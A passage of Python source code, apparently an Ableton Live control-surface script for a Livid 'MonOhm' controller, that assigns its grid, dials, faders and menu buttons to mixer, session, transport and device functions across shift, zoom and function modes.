self._scene_main[row].clip_slot(column).set_recording_value(CLIP_RECORDING[self._rgb])
self._session_zoom.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom2.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom2.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom2.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom_main.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom_main.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom_main.set_selected_value(ZOOM_SELECTED[self._rgb])
self.refresh_state()
def _setup_device_control(self):
self._device = DeviceComponent()
self._device.name = 'Device_Component'
self._device.set_device = self.device_set_device(self._device)
self._device._is_banking_enabled = self.device_is_banking_enabled(self._device)
self.set_device_component(self._device)
#self.bank = DeviceCallbackComponent(self._device, 1)
#self.bank.name = 'Device_Bank'
#self.device_instance = DeviceCallbackComponent(self._device, 2)
#self.device_instance.name = 'Device_Instance'
self._device_navigator = DetailViewControllerComponent()
self._device_navigator.name = 'Device_Navigator'
self._device_selection_follows_track_selection = FOLLOW
self._device.set_parameter_controls(tuple([self._dial[index] for index in range(8)]))
self._device.set_enabled(False)
def _setup_crossfader(self):
self._mixer.set_crossfader_control(self._crossfader)
def _setup_device_selector(self):
self._device_selector = DeviceSelectorComponent(self)
self._device_selector.name = 'Device_Selector'
def _setup_monomod(self):
self._host = MonomodComponent(self)
self._host.name = 'Monomod_Host'
self._host._host_name = 'MonOhm'
self.hosts = [self._host]
def _setup_modes(self):
self._monomod_mode = MonomodModeComponent(self, self.monomod_mode_update)
self._monomod_mode.name = 'Monomod_Mode'
self._monomod_mode.set_mode_toggle(self._livid)
self._shift_mode = ShiftModeComponent(self, self.shift_update)
self._shift_mode.name = 'Shift_Mode'
self._shift_mode.set_mode_toggle(self._shift_l, self._shift_r)
self._l_function_mode = FunctionModeComponent(self, self.l_function_update)
self._l_function_mode.name = 'Left_Function_Mode'
self._r_function_mode = FunctionModeComponent(self, self.r_function_update)
self._r_function_mode.name = 'Right_Function_Mode'
self._m_function_mode = FunctionModeComponent(self, self.m_function_update)
self._m_function_mode.name = 'Main_Function_Mode'
self._function_modes = [self._l_function_mode, self._r_function_mode, self._m_function_mode]
"""shift/zoom methods"""
def deassign_matrix(self):
for session in self._sessions:
session.set_stop_track_clip_buttons(None)
session.set_track_bank_buttons(None, None)
session.set_scene_bank_buttons(None, None)
for zoom in self._zooms:
zoom.set_button_matrix(None)
zoom.set_nav_buttons(None, None, None, None)
for column in range(4):
self._mixer2.channel_strip(column).set_select_button(None)
self._mixer2.return_strip(column).set_mute_button(None)
self._mixer2.return_strip(column).set_solo_button(None)
self._mixer2.return_strip(column).set_arm_button(None)
self._mixer2.return_strip(column).set_crossfade_toggle(None)
self._mixer2.return_strip(column).set_select_button(None) #shouldn't this be somewhere else?
self._mixer2.channel_strip(column).set_crossfade_toggle(None)
self._mixer2.channel_strip(column).set_mute_button(None)
self._mixer2.channel_strip(column).set_solo_button(None)
self._mixer2.channel_strip(column).set_arm_button(None)
for row in range(5):
self._scene[row].clip_slot(column).set_launch_button(None)
self._scene2[row].clip_slot(column).set_launch_button(None)
for index in range(5):
self._scene[index].set_launch_button(None)
self._scene2[index].set_launch_button(None)
self._scene_main[index].set_launch_button(None)
for column in range(8):
self._button[column].set_on_off_values(127, 0)
self._mixer.channel_strip(column).set_select_button(None)
self._mixer.channel_strip(column).set_crossfade_toggle(None)
self._mixer.channel_strip(column).set_mute_button(None)
self._mixer.channel_strip(column).set_solo_button(None)
self._mixer.channel_strip(column).set_arm_button(None)
for row in range(5):
self._scene_main[row].clip_slot(column).set_launch_button(None)
for row in range(8):
self._grid[column][row].set_channel(0)
self._grid[column][row].release_parameter()
self._grid[column][row].use_default_message()
self._grid[column][row].set_enabled(True)
self._grid[column][row].set_on_off_values(127, 0)
self._grid[column][row].send_value(0, True)
self._send_reset.set_buttons(tuple(None for index in range(4)))
def zoom_off(self):
for column in range(4):
self._grid[column][5].set_on_value(MUTE[self._rgb])
self._mixer.channel_strip(column).set_mute_button(self._grid[column][5])
self._grid[column][6].set_on_value(SOLO[self._rgb])
self._mixer.channel_strip(column).set_solo_button(self._grid[column][6])
self._grid[column][7].set_on_value(ARM[self._rgb])
self._mixer.channel_strip(column).set_arm_button(self._grid[column][7])
for row in range(5):
self._scene[row].clip_slot(column).set_launch_button(self._grid[column][row])
if(self._r_function_mode._mode_index in range(0,3)):
self._grid[column + 4][5].set_on_value(MUTE[self._rgb])
self._mixer2.channel_strip(column).set_mute_button(self._grid[column + 4][5])
self._grid[column + 4][6].set_on_value(SOLO[self._rgb])
self._mixer2.channel_strip(column).set_solo_button(self._grid[column + 4][6])
self._grid[column + 4][7].set_on_value(ARM[self._rgb])
self._mixer2.channel_strip(column).set_arm_button(self._grid[column + 4][7])
for row in range(5):
self._scene2[row].clip_slot(column).set_launch_button(self._grid[column + 4][row])
elif(self._r_function_mode._mode_index is 3):
self._grid[column + 4][5].set_on_value(MUTE[self._rgb])
self._mixer2.return_strip(column).set_mute_button(self._grid[column + 4][5])
self._grid[column + 4][6].set_on_value(SOLO[self._rgb])
self._mixer2.return_strip(column).set_solo_button(self._grid[column + 4][6])
#self._mixer2.return_strip(column).set_crossfade_toggle(self._grid[column + 4][7])
for row in range(5):
self._grid[column + 4][row].send_value(USER1_COLOR[self._rgb], True)
self._grid[column + 4][row].set_channel(RIGHT_USER1_CHANNEL)
self._grid[column + 4][row].set_identifier(RIGHT_USER1_MAP[column][row])
self._grid[column + 4][row].set_enabled(False) #this has to happen for translate to work
if(self._r_function_mode._mode_index is 0):
for index in range(4):
self._grid[index + 4][7].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][7] for index in range(4)))
def zoom_off_m(self):
self.deassign_right_controls()
for column in range(8):
self._grid[column][5].set_on_value(MUTE[self._rgb])
self._mixer.channel_strip(column).set_mute_button(self._grid[column][5])
self._grid[column][6].set_on_value(SOLO[self._rgb])
self._mixer.channel_strip(column).set_solo_button(self._grid[column][6])
self._grid[column][7].set_on_value(ARM[self._rgb])
self._mixer.channel_strip(column).set_arm_button(self._grid[column][7])
for row in range(5):
self._scene_main[row].clip_slot(column).set_launch_button(self._grid[column][row])
def zoom_left(self):
track_stop_buttons = []
track_stop_buttons2 = []
for index in range(4):
self._grid[index][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer.channel_strip(index).set_crossfade_toggle(self._grid[index][6])
self._grid[index + 4][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer2.channel_strip(index).set_crossfade_toggle(self._grid[index + 4][6])
self._grid[index][7].set_on_value(TRACK_STOP[self._rgb])
track_stop_buttons.append(self._grid[index][7])
self._grid[index + 4][7].set_on_value(TRACK_STOP[self._rgb])
track_stop_buttons2.append(self._grid[index + 4][7])
for index in range(5):
self._grid[7][index].set_off_value(SCENE_LAUNCH[self._rgb])
self._scene[index].set_launch_button(self._grid[7][index])
self._session.set_stop_track_clip_buttons(tuple(track_stop_buttons))
self._session2.set_stop_track_clip_buttons(tuple(track_stop_buttons2))
self._session_zoom.set_button_matrix(self._matrix)
self._grid[0][5].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._grid[0][5])
self._grid[1][5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._grid[1][5])
self._grid[2][5].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._grid[2][5])
self._grid[3][5].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._grid[3][5])
for index in range(4):
self._grid[index + 4][5].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][5] for index in range(4)))
for index in range(4):
self._button[index + 4].set_off_value(DEVICE_SELECT[self._rgb])
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
def zoom_right(self):
track_stop_buttons = []
track_stop_buttons2 = []
for index in range(4):
self._grid[index][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer.channel_strip(index).set_crossfade_toggle(self._grid[index][6])
self._grid[index][7].set_off_value(TRACK_STOP[self._rgb])
track_stop_buttons.append(self._grid[index][7])
for index in range(5):
self._grid[7][index].set_off_value(SCENE_LAUNCH[self._rgb])
self._scene2[index].set_launch_button(self._grid[7][index])
self._session.set_stop_track_clip_buttons(tuple(track_stop_buttons))
if(self._r_function_mode._mode_index < 3):
for index in range(4):
self._grid[index + 4][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer2.channel_strip(index).set_crossfade_toggle(self._grid[index + 4][6])
self._grid[index + 4][7].set_off_value(TRACK_STOP[self._rgb])
track_stop_buttons2.append(self._grid[index + 4][7])
self._session2.set_stop_track_clip_buttons(tuple(track_stop_buttons2))
else:
for index in range(4):
self._grid[index + 4][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer2.return_strip(index).set_crossfade_toggle(self._grid[index + 4][6])
self._session_zoom2.set_button_matrix(self._matrix)
self._grid[0][5].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._grid[0][5])
self._grid[1][5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._grid[1][5])
self._grid[2][5].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._grid[2][5])
self._grid[3][5].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._grid[3][5])
for index in range(4):
self._grid[index + 4][5].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][5] for index in range(4)))
for index in range(4):
self._button[index]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index] for index in range(4)), 0)
def zoom_main(self):
track_stop_buttons = []
for index in range(8):
self._grid[index][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer.channel_strip(index).set_crossfade_toggle(self._grid[index][6])
self._grid[index][7].set_on_value(TRACK_STOP[self._rgb])
track_stop_buttons.append(self._grid[index][7])
for index in range(5):
self._grid[7][index].set_on_value(SCENE_LAUNCH[self._rgb])
self._scene_main[index].set_launch_button(self._grid[7][index])
self._session_main.set_stop_track_clip_buttons(tuple(track_stop_buttons))
self._session_zoom_main.set_button_matrix(self._matrix)
self._grid[0][5].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._grid[0][5])
self._grid[1][5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._grid[1][5])
self._grid[2][5].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._grid[2][5])
self._grid[3][5].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._grid[3][5])
for index in range(4):
self._grid[index + 4][5].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][5] for index in range(4)))
for index in range(4):
self._button[index + 4].set_off_value(DEVICE_SELECT[self._rgb])
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
"""function mode callbacks"""
def l_function_update(self):
mode = self._l_function_mode._mode_index
if(self._l_function_mode.is_enabled() is False):
self._l_function_mode.set_mode_buttons(None)
elif(self._l_function_mode.is_enabled() is True):
if(len(self._l_function_mode._modes_buttons) is 0):
for index in range(4):
self._mixer.channel_strip(index).set_select_button(None)
buttons = []
for index in range(4):
buttons.append(self._button[index])
self._l_function_mode.set_mode_buttons(tuple(buttons))
if(self._shift_mode._mode_index is 2):
for index in range(4):
if(mode != index):
self._button[index].turn_off()
else:
self._button[index].turn_on()
if(mode is 0):
self.assign_left_device_dials()
self.show_message('Mixer Split:Left Side Dials in Device(Top) and Selected Send(Bottom) Mode')
elif(mode is 1):
self.assign_left_send_dials()
self.show_message('Mixer Split:Left Side Dials in Channel Send Mode (Sends 1-3)')
elif(mode is 2):
self.assign_left_filter_dials()
self.show_message('Mixer Split:Left Side Dials in Filter(Top) and Pan(Bottom) Mode')
elif(mode is 3):
self.assign_left_user_dials()
self.show_message('Mixer Split:Left Side Dials in User Map Mode')
def r_function_update(self):
mode = self._r_function_mode._mode_index
if(self._r_function_mode.is_enabled() is False):
self._r_function_mode.set_mode_buttons(None)
self.set_highlighting_session_component(self._session2)
self._session2._do_show_highlight()
#self._session._highlighting_callback(self._session._track_offset, self._session._scene_offset, 4, 5, 1)
elif(self._r_function_mode.is_enabled() is True):
if(len(self._r_function_mode._modes_buttons) is 0):
for index in range(4):
self._mixer2.channel_strip(index).set_select_button(None)
buttons = []
for index in range(4):
buttons.append(self._button[index + 4])
self._r_function_mode.set_mode_buttons(tuple(buttons))
if(self._shift_mode._mode_index is 3):
for index in range(4):
if(mode != index):
self._button[index + 4].turn_off()
else:
self._button[index + 4].turn_on()
if(mode is 3):
self.assign_right_return_controls()
self.show_message('Mixer Split:Right Side Faders = Returns 1-4, Dials = Returns Pan')
else: # mode in range(0, 3)
self.assign_right_volume_controls()
self._session2.set_offsets(int(self._mem[mode]), self._session2._scene_offset)
self.show_message('Mixer Split:Right Side Faders = Channel Mixer, Dials = Returns, Track Offset' + str(RIGHT_MODE_OFFSETS[mode]))
self._ohm_type = OHM_TYPE[mode]
self._ohm = OHM_VALUE[mode]
def m_function_update(self):
mode = self._m_function_mode._mode_index
if(self._m_function_mode.is_enabled() is False):
self._m_function_mode.set_mode_buttons(None)
#self._session.set_show_highlight(False)
#self._session2.set_show_highlight(False)
self.set_highlighting_session_component(self._session_main)
self._session_main._do_show_highlight()
#self._session_main._highlighting_callback(self._session_main._track_offset, self._session_main._scene_offset, 8, 5, 1)
elif(self._m_function_mode.is_enabled() is True):
if(len(self._m_function_mode._modes_buttons) is 0):
for index in range(8):
self._mixer.channel_strip(index).set_select_button(None)
buttons = []
for index in range(4):
buttons.append(self._button[index])
self._m_function_mode.set_mode_buttons(tuple(buttons))
if(self._shift_mode._mode_index is 4):
for index in range(4):
if(mode != index):
self._button[index].turn_off()
else:
self._button[index].turn_on()
if(mode is 0):
self.assign_main_controls1()
self.show_message('Mixer Linked:Dials in Device(Top) and Selected Send(Bottom) Mode')
elif(mode is 1):
self.assign_main_controls2()
self.show_message('Mixer Linked:Dials in Channel Send Mode (Sends 1-3)')
elif(mode is 2):
self.assign_main_controls3()
self.show_message('Mixer Linked:Left Dials in Filter(Top) and Pan(Bottom) Mode')
elif(mode is 3):
self.assign_main_controls4()
self.show_message('Mixer Linked:Dials in User Map Mode')
def shift_update(self):
self._clutch_device_selection = True
self.allow_updates(False)
self.deassign_channel_select_buttons()
self.deassign_matrix()
self.deassign_menu()
if(self._cntrlr != None):
self._cntrlr._monohm_shift(self._shift_mode._mode_index)
if(self._monomod_mode._mode_index is 0): #if monomod is not on
if(self._shift_mode._mode_index is 0): #if no shift is pressed
self._shift_mode._mode_toggle1.turn_off()
self._shift_mode._mode_toggle2.turn_off()
if(self.split_mixer() is False):
self.set_split_mixer(True)
for zoom in self._zooms:
zoom._on_zoom_value(0)
self.zoom_off()
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.assign_channel_select_buttons()
#self._recalculate_selected_channel()
#self.assign_transport_to_menu()
self.assign_session_nav_to_menu()
self.l_function_update()
self.r_function_update()
self.set_highlighting_session_component(self._session)
self._session._do_show_highlight()
elif(self._shift_mode._mode_index is 1): #if no shift is pressed, but mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
if(self.split_mixer() is True):
self.set_split_mixer(False)
for zoom in self._zooms:
zoom._on_zoom_value(0)
self.zoom_off_m()
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.assign_main_channel_select_buttons()
self.assign_session_main_nav_to_menu()
self.m_function_update()
self.set_highlighting_session_component(self._session_main)
self._session_main._do_show_highlight()
elif(self._shift_mode._mode_index > 1): #if a shift is pressed
self.assign_device_nav_to_menu()
self.deassign_channel_select_buttons()
if(self._shift_mode._mode_index is 2): #if shift left
self._shift_mode._mode_toggle1.turn_on()
self.zoom_left()
#self._session_zoom._zoom_value(1)
self._session_zoom._on_zoom_value(1)
self._session.set_enabled(True) #this is a workaround so that the stop buttons still function
self._l_function_mode.set_enabled(True)
self.set_highlighting_session_component(self._session)
self._session._do_show_highlight()
elif(self._shift_mode._mode_index is 3): #if shift right
self._shift_mode._mode_toggle2.turn_on()
self.zoom_right()
self._session_zoom2._on_zoom_value(1)
self._session2.set_enabled(True) #this is a workaround so that the stop buttons still function
self._r_function_mode.set_enabled(True)
self.assign_shift_controls()
if(self._r_function_mode._mode_index < 4):
self.set_highlighting_session_component(self._session2)
self._session2._do_show_highlight()
elif(self._shift_mode._mode_index is 4): #if either shift pressed while mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
self.zoom_main()
self._session_zoom_main._on_zoom_value(1)
self._session_main.set_enabled(True) #this is a workaround so that the stop buttons still function
self._m_function_mode.set_enabled(True)
self.assign_shift_controls()
self.set_highlighting_session_component(self._session_main)
self._session_main._do_show_highlight()
self._device_selector.set_enabled(True)
else:
if(self._shift_mode._mode_index is 0): #if no shift is pressed
self._shift_mode._mode_toggle1.turn_off()
self._shift_mode._mode_toggle2.turn_off()
if(self.split_mixer() is False):
self.set_split_mixer_monomod(True)
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.l_function_update()
self.r_function_update()
self.assign_channel_select_buttons()
#self._recalculate_selected_channel()
elif(self._shift_mode._mode_index is 1): #if no shift is pressed, but mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
if(self.split_mixer() is True):
self.set_split_mixer(False)
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.m_function_update()
self.assign_main_channel_select_buttons()
elif(self._shift_mode._mode_index > 1): #if a shift is pressed
self.deassign_channel_select_buttons()
self.assign_monomod_shift_to_menu()
if(self._shift_mode._mode_index is 2): #if shift left
self._shift_mode._mode_toggle1.turn_on()
for index in range(4):
self._button[index + 4]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
self._l_function_mode.set_enabled(True)
self._session.set_show_highlight(True)
elif(self._shift_mode._mode_index is 3): #if shift right
self._shift_mode._mode_toggle2.turn_on()
for index in range(4):
self._button[index]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index] for index in range(4)), 0)
self._r_function_mode.set_enabled(True)
self.assign_shift_controls()
if(self._r_function_mode._mode_index < 4):
self.set_highlighting_session_component(self._session2)
self._session2._do_show_highlight()
elif(self._shift_mode._mode_index is 4): #if either shift pressed while mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
for index in range(4):
self._button[index + 4]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
self._m_function_mode.set_enabled(True)
self.assign_shift_controls()
self._session_main.set_show_highlight(True)
self._device_selector.set_enabled(True)
if self._shift_mode._mode_index > 1:
self._host._shift_value(1)
else:
self._host._shift_value(0)
self.allow_updates(True)
self._clutch_device_selection = False
#self._request_rebuild_midi_map()
if(self._shift_mode._mode_index < 2):
self._monobridge._send('touch', 'off')
else:
self._monobridge._send('touch', 'on')
def monomod_mode_update(self):
if(self._monomod_mode._mode_index == 0):
self._host.set_enabled(False)
self._host._set_button_matrix(None)
self._host._set_nav_buttons(None)
self._host._set_lock_button(None)
self._host._set_alt_button(None)
self._livid.turn_off()
self._shift_mode.update()
#self._session._reassign_scenes()
elif(self._monomod_mode._mode_index == 1):
self._livid.turn_on()
#self.deassign_matrix() #moved to set_mode so that the matrix doesn't clear AFTER it has been loaded by monomod
if(self._host._active_client == None):
self.assign_alternate_mappings()
else:
self.deassign_matrix()
self.deassign_menu()
self._monomod.reset()
self._host._set_button_matrix(self._monomod)
self._host._set_nav_buttons([self._menu[0], self._menu[3], self._menu[4], self._menu[5]])
self._host._set_lock_button(self._menu[1])
self._host._set_alt_button(self._menu[2])
self._host.set_enabled(True)
self._shift_mode.update()
#self.show_message('Monomod grid enabled')
"""left control management methods"""
def deassign_left_dials(self):
for index in range(12):
self._dial[index].use_default_message()
self._dial[index].release_parameter()
self._dial[index].set_enabled(True)
if(self._device._parameter_controls != None):
for control in self._device._parameter_controls:
control.release_parameter()
self._device._parameter_controls = None
self._device.set_enabled(False)
self._mixer.selected_strip().set_send_controls(None)
for track in range(4):
self._mixer.channel_strip(track).set_send_controls(None)
self._mixer.channel_strip(track).set_pan_control(None)
def assign_left_device_dials(self):
self.log_message('assign left device dials')
self._backlight_type = BACKLIGHT_TYPE[0]
self._backlight = BACKLIGHT_VALUE[0]
self.deassign_left_dials()
self._device.set_enabled(True)
self._device.set_parameter_controls(tuple(self._dial[0:8]))
self._mixer.selected_strip().set_send_controls(tuple(self._dial[8:12]))
def assign_left_send_dials(self):
self._backlight_type = BACKLIGHT_TYPE[1]
self._backlight = BACKLIGHT_VALUE[1]
self.deassign_left_dials()
for track in range(4):
channel_strip_send_controls = []
for control in range(3):
channel_strip_send_controls.append(self._dial[track + (control * 4)])
self._mixer.channel_strip(track).set_send_controls(tuple(channel_strip_send_controls))
def assign_left_filter_dials(self):
self._backlight_type = BACKLIGHT_TYPE[2]
self._backlight = BACKLIGHT_VALUE[2]
self.deassign_left_dials()
for index in range(4):
self._mixer.track_filter(index).set_filter_controls(self._dial[index], self._dial[index + 4])
for track in range(4):
self._mixer.channel_strip(track).set_pan_control(self._dial[track + 8])
def assign_left_user_dials(self):
self._backlight_type = BACKLIGHT_TYPE[3]
self._backlight = BACKLIGHT_VALUE[3]
self.deassign_left_dials()
for index in range(12):
self._dial[index].set_channel(L_USER_DIAL_CHAN)
self._dial[index].set_identifier(L_USER_DIAL_MAP[index])
self._dial[index].set_enabled(False)
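# In user-map mode the left dials are detached from Live parameters and simply
# re-channelised/renumbered via L_USER_DIAL_CHAN / L_USER_DIAL_MAP; disabling
# the element is presumably what lets the incoming CC be translated and passed
# through rather than handled by the script, mirroring the note in zoom_off()
# ("this has to happen for translate to work").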
"""right control management methods"""
def deassign_right_controls(self):
self._mixer.master_strip().set_volume_control(None)
self._mixer.set_prehear_volume_control(None)
for index in range(4):
self._mixer.channel_strip(index + 4).set_volume_control(None)
self._mixer2.channel_strip(index).set_volume_control(None)
self._mixer2.return_strip(index).set_volume_control(None)
self._mixer2.return_strip(index).set_pan_control(None)
self._mixer2.selected_strip().set_send_controls(None)
self._mixer2.return_strip(0).set_send_controls(tuple([None, None]))
self._mixer2.return_strip(1).set_send_controls(tuple([None, None]))
self._dial[index + 12].use_default_message()
self._fader[index + 4].use_default_message()
self._dial[index + 12].release_parameter()
self._fader[index + 4].release_parameter()
self._fader[index + 4].set_enabled(True)
self._dial[index + 12].set_enabled(True)
def assign_right_volume_controls(self):
#self._ohm_type = OHM_TYPE[0]
#self._ohm = OHM_VALUE[0]
self.deassign_right_controls()
for index in range(4):
if(self._mixer2.channel_strip(index)):
self._mixer2.channel_strip(index).set_volume_control(self._fader[index + 4])
for index in range(4):
if(self._mixer2.return_strip(index)):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_right_return_controls(self):
self._ohm_type = OHM_TYPE[3]
self._ohm = OHM_VALUE[3]
self.deassign_right_controls()
#need to turn off session2 and session_zoom2 here, and in all subsequent right side modes
#self._session_main._highlighting_callback(len(self.song.song.tracks), self._session2._scene_offset, 4, 5, 1)
self._session2.set_show_highlight(False)
for index in range(4):
if(self._mixer2.return_strip(index)):
self._mixer2.return_strip(index).set_volume_control(self._fader[index + 4])
self._mixer2.return_strip(index).set_pan_control(self._dial[index + 12])
"""main control management methods"""
def assign_main_controls1(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_device_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_main_controls2(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_send_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_main_controls3(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_filter_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_main_controls4(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_user_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
"""menu button management methods"""
def deassign_menu(self):
for index in range(6):
self._menu[index].set_on_off_values(127, 0)
self._device.set_lock_button(None)
self._device.set_on_off_button(None)
self._device_navigator.set_device_nav_buttons(None, None)
self._device.set_bank_nav_buttons(None, None)
self._transport.set_play_button(None)
self._transport.set_record_button(None)
self._transport.set_stop_button(None)
self._transport.set_loop_button(None)
self._transport.set_overdub_button(None)
self._session.set_stop_all_clips_button(None)
self._transport.set_play_button(None)
self._transport.set_stop_button(None)
self._session_main.set_track_bank_buttons(None, None)
self._session_main.set_scene_bank_buttons(None, None)
def assign_device_nav_to_menu(self):
self._menu[2].set_on_value(DEVICE_LOCK[self._rgb])
self._device.set_lock_button(self._menu[2])
self._menu[1].set_on_value(DEVICE_ON[self._rgb])
self._device.set_on_off_button(self._menu[1])
for index in range(2):
self._menu[index + 4].set_on_value(DEVICE_NAV[self._rgb])
self._menu[index * 3].set_on_value(DEVICE_BANK[self._rgb])
self._device_navigator.set_device_nav_buttons(self._menu[4], self._menu[5])
self._device.set_bank_nav_buttons(self._menu[0], self._menu[3])
def assign_transport_to_menu(self):
self._menu[0].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[0])
self._menu[2].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._menu[2])
self._menu[1].set_on_value(STOP[self._rgb])
self._transport.set_stop_button(self._menu[1])
self._menu[3].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._menu[3])
self._menu[5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._menu[5])
self._menu[4].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._menu[4])
def assign_session_nav_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[1])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[2])
for index in range(2):
self._menu[index + 4].set_on_value(SESSION_NAV[self._rgb])
self._menu[index * 3].set_on_value(SESSION_NAV[self._rgb])
self._session.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session.set_scene_bank_buttons(self._menu[3], self._menu[0])
def assign_monomod_shift_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[1])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[2])
for index in range(2):
self._menu[index + 4].set_on_value(DEVICE_NAV[self._rgb])
self._menu[index * 3].set_on_value(DEVICE_BANK[self._rgb])
self._device_navigator.set_device_nav_buttons(self._menu[4], self._menu[5])
self._device.set_bank_nav_buttons(self._menu[0], self._menu[3])
def assign_session_bank_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[0])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[1])
for index in range(2):
self._menu[index + 4].set_on_value(BANK_BUTTONS[self._rgb])
self._menu[index * 3].set_on_value(BANK_BUTTONS[self._rgb])
self._session.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session.set_scene_bank_buttons(self._menu[3], self._menu[0])
def assign_session2_bank_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[0])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[1])
for index in range(2):
self._menu[index + 4].set_on_value(BANK_BUTTONS[self._rgb])
self._menu[index * 3].set_on_value(BANK_BUTTONS[self._rgb])
self._session2.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session2.set_scene_bank_buttons(self._menu[3], self._menu[0])
def assign_session_main_nav_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[1])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[2])
for index in range(2):
self._menu[index + 4].set_on_value(BANK_BUTTONS[self._rgb])
self._menu[index * 3].set_on_value(BANK_BUTTONS[self._rgb])
self._session_main.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session_main.set_scene_bank_buttons(self._menu[3], self._menu[0])
"""channel selection management methods"""
def deassign_channel_select_buttons(self):
for index in range(8):
if(self._mixer.channel_strip(index)):
self._mixer.channel_strip(index).set_select_button(None)
self._button[index].release_parameter()
for index in range(4):
self._mixer2.channel_strip(index).set_select_button(None)
self._mixer2.return_strip(index).set_select_button(None)
self._mixer2.master_strip().set_select_button(None)
self._button[index + 4].release_parameter()
